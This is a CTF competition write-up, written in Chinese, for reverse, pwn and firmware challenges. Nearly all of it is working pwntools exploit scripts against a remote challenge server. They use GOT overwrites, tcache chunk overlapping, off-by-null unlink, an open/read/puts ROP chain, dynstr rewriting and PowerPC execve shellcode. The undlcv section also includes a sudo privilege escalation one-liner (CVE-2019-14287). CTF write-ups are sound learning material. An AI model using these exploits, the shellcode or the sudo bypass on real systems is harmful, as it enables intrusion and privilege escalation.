REVERSE
decryption
直接按照算法爆破(都是可見字元)
exp
buf=[0x12,0x45,0x10,0x47,0x19,0x49,0x49,0x49,0x1a,0x4f,0x1c,0x1e,0x52,0x66,0x1d,0x52,0x66,0x67,0x68,0x67,0x65,0x6f,0x5f,0x59,0x58,0x5e,0x6d,0x70,0xa1,0x6e,0x70,0xa3]
temp=[0x2d,0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,0x4c,0x4d,0x4e,0x4f,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5a,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7a]
flag=''
for j in range(32):
temp1=[]
for i in temp:
v5=i
v4=j
v3=1
while v3!=0:
v3=2*(v4&v5)
v5^=v4
v4=v3
# hex(v5)
# hex(v3)
temp1.append(v5^0x23)
# print(hex(v5^0x23))
print(hex(temp[temp1.index(buf[j])]))
flag+=chr(temp[temp1.index(buf[j])])
print(flag)
PWN
emarm
checksec
爆破成功後可以任意位址寫,直接寫atoi的got表為system,之後輸入sh就可以getshell。由于是用qemu啟動的是以libc的位址不會改變。遠端的時候可以直接用改atoi的got表為puts先leak基位址,再getshell。
exp
from pwn import *
local=0
elf=ELF('./a')
libc=ELF('./lib/libc.so.6')
def exp():
while 1:
try:
if local:
sh=process(["qemu-aarch64","-L","./","./a"])
# sh=process(["qemu-aarch64","-g","1234","-L","./","./a"])
libc.address=0x400084d000
# 0x00000040008b8308
else:
sh=remote('183.129.189.60','10012')
libc.address=0x4000830000
# 0x000000400089b308
sh.sendlineafter('passwd:\n','\xc7')
sh.send(str(elf.got['atoi']))
sh.sendafter('success',p64(libc.sym['system']))
sh.send('sh\x00')
sh.interactive()
except:
sh.close()
exp()
ememarm
checksec
題目漏洞
存在off-by-null
通過調試可以發現存在tcache直接構造chunk overlapping。将free_hook寫入,之後通過edit寫free_hook為system。
from pwn import *
local=0
elf=ELF('./a')
libc=ELF('./lib/libc.so.6')
if local:
sh=process(["qemu-aarch64","-L","./","./a"])
# sh=process(["qemu-aarch64","-g","1234","-L","./","./a"])
libc.address=0x400084d000
# 0x00000040008b8308
else:
sh=remote('183.129.189.60','10034')
libc.address=0x4000830000
# 0x000000400089b308
def add_0x20(cx,cy,choose):
sh.sendlineafter(': \n','1')
sh.sendafter('cx:\n',cx)
sh.sendafter('cy:\n',cy)
sh.sendlineafter('?\n',str(choose))
def show(index):
sh.sendlineafter(': \n','2')
sh.sendline(str(index))
def edit(index,content):
sh.sendlineafter(': \n','3')
sh.sendline(str(index))
sh.send(content)
def add_0x30(cx,cy,choose):
sh.sendlineafter(': \n','4')
sh.sendafter('cx:\n',cx)
sh.sendafter('cy:\n',cy)
sh.sendlineafter('?\n',str(choose))
def init():
sh.sendafter('\n','/bin/sh\x00')
init()
add_0x20('a','b',1) # 1
add_0x20('c','d',1) # 2
add_0x20('\x00','\x31',1) # 3
add_0x20('\x00','\x20',1) # 4
add_0x30('i','j',1) # 5
edit(4,p64(0)+p64(0x21)+p64(0))
add_0x20('a',p64(elf.got['free']),1)
edit(4,p64(libc.sym['system']))
# edit(4,p64(elf.plt['puts']))
# context.log_level='debug'
sh.sendlineafter(': \n','5')
# edit(3,'a'*0x18)
sh.interactive()
justcode
checksec
題目還禁用了execve
題目漏洞
棧上資料沒有初始化。
棧上資料沒有初始化,可以通過sub_400C47()函數配合scanf完成4位元組位址的任意位址寫。先通過sub_400C47()函數洩露出libc的基位址和棧位址,之後将exit的got表修改為main函數的位址。之後将strdup的got表寫入add_rsp8_ret的低四個位元組。最後再次調用sub_400C47()函數寫入rop鍊。
exp
from pwn import *
context.arch='amd64'
local=0
if local:
sh=process('./a')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
sh=remote('183.129.189.60','10041')
libc=ELF('./libc-2.23.so')
elf=ELF('./a')
exit_got=elf.got['exit']
bss_addr=elf.bss()
main_addr=0x400D76
rop_addr=0x6020e0
pop_rdi_ret_addr=0x21112
pop_rsi_ret_addr=0x202f8
pop_rdx_ret_addr=0x1b92
add_rsp8_ret=0x35142
def sendcode(code):
sh.recvuntil('your code:\n')
for i in code:
sh.sendline(str(i))
def set_name(name):
sh.sendafter('name:\n',name)
def set_id_info(id,info):
sh.sendlineafter('id',str(id))
sh.sendafter('info:',info)
def get_high(num):
return num>>32
def get_low(num):
return num&0xffffffff
sendcode([1,1,2,3])
set_name('a'*8)
sh.recvuntil('a'*8)
libc.address=u64(sh.recv(6).ljust(8,'\x00'))-libc.sym['_IO_default_uflow']-0xe
print hex(libc.address)
pop_rdi_ret_addr+=libc.address
pop_rsi_ret_addr+=libc.address
pop_rdx_ret_addr+=libc.address
add_rsp8_ret+=libc.address
payload='a'*0xc+p32(exit_got)
set_name(payload)
set_id_info(main_addr,'aaaa')
sendcode([1,3,3])
set_name('a'*0x28)
sh.recvuntil('a'*0x28)
main_ret_addr=u64(sh.recv(6).ljust(8,'\x00'))+0x28
print hex(main_ret_addr)
flag_addr=main_ret_addr-0x80
# 0x7ffd64afaf18-0x7FFD64AFAE98
# # open(&flag,0,0)
rop_chain=p64(pop_rdi_ret_addr)+p64(flag_addr)+p64(pop_rsi_ret_addr)+p64(0)+p64(pop_rdx_ret_addr)+p64(0)+p64(libc.sym['open'])
# read(3,bss_addr,0x40)
rop_chain+=p64(pop_rdi_ret_addr)+p64(3)+p64(pop_rsi_ret_addr)+p64(bss_addr)+p64(pop_rdx_ret_addr)+p64(0x40)+p64(elf.plt['read'])
# puts(bss_addr)
rop_chain+=p64(pop_rdi_ret_addr)+p64(bss_addr)+p64(elf.plt['puts'])+'./flag\x00'
sendcode([1,2,1,3])
payload='a'*0xc+p32(elf.got['strdup'])
set_name(payload)
set_id_info(get_low(add_rsp8_ret),'aaaa')
set_name(rop_chain)
sh.interactive()
undlcv
checksec
題目漏洞
存在off-by-null
沒什麼說的直接unlink。但是題目沒有輸出函數無法leak位址,是以隻能修改 .dynamic 節中的字元串表的位址然後将atoi字元串修改為system,修改atoi的got表為[email protected]+4以便觸發 _dl_runtime_resolve。getshell後需要使用sudo提權(CVE-2019-14287)後才能cat flag。
exp
from pwn import *
local=0
if local:
sh=process('./undlcv')
else:
sh=remote('183.129.189.60','10013')
heap_pointer=0x403480
elf=ELF('./undlcv')
def add(index):
sleep(0.1)
sh.sendline('1')
sleep(0.1)
sh.sendline(str(index))
sleep(0.1)
def edit(index,content):
sleep(0.1)
sh.sendline('2')
sleep(0.1)
sh.sendline(str(index))
sleep(0.1)
sh.send(content)
sleep(0.1)
def delete(index):
sleep(0.1)
sh.sendline('3')
sleep(0.1)
sh.sendline(str(index))
sleep(0.1)
add(0)
add(1)
sleep(0.1)
sh.sendline('4')
payload=p64(0)+p64(0xf1)+p64(heap_pointer-0x18)+p64(heap_pointer-0x10)+'\x00'*0xd0+p64(0xf0)
edit(0,payload)
delete(1)
dynstr=elf.get_section_by_name('.dynstr').data()
dynstr=dynstr.replace("atoi","system")
payload=p64(0)*3+p64(elf.got['atoi'])+p64(0x4032A8)+dynstr
edit(0,payload)
edit(1,p64(0x403490))
edit(0,p64(0x401084))
sleep(0.1)
sh.sendline('/bin/sh\x00')
# context.log_level='debug'
sh.interactive()
# sudo -u#-1 cat flag
固件
NodeMCU
直接查找字元串flag
PPPPPPC
存在棧溢出,直接ret2shellcode,題目提供的qemu會輸出報錯資訊,根據報錯資訊可以算出一系列位址。如果shellcode彙編的時候報錯可以根據報錯資訊解決。
exp
from pwn import *
context.arch='powerpc'
context.endian='big'
local=0
if local:
sh=process(["./qemu-ppc-static","./a"])
# sh=process(["./qemu-ppc-static","-g","1234","./a"])
# 0xF6FFEf18-0xf6ffef10=0x8 # vscode shell
# 0xF6FFEd78-0xf6ffed70=0x8 # vmware
shellcode=asm("""
xor 3,3,3
xor 6,6,6
addi 6,6,0x7000
add 6,6,6
addi 6,6,0xd78
lis 3, 0xF6FF
add 3,3,6
xor 4,4,4
xor 5,5,5
li 0, 11
sc
""")
# 0xF6FFEDD8=0xf6ffef10-0x138 # vscode shell
# 0xf6ffec38=0xf6ffed70-0x138 # vmware
shellcode_addr=0xf6ffec38
else:
sh=remote('183.129.189.60','10039')
# 0xf6fffbf8-0xf6fffbf0=0x8
shellcode=asm("""
xor 3,3,3
xor 6,6,6
addi 6,6,0x7000
add 6,6,6
addi 6,6,0x1000
addi 6,6,0xbf8
lis 3, 0xF6FF
add 3,3,6
xor 4,4,4
xor 5,5,5
li 0, 11
sc
""")
# 0xf6fffab8=0xf6fffbf0-0x138
shellcode_addr=0xf6fffab8
payload=shellcode.ljust(0x13c,'a')+p32(shellcode_addr)+'/bin/sh\x00'
# payload='a'*0x13c+'b'*4
sh.sendlineafter('Tell me your name: ',payload)
sh.interactive()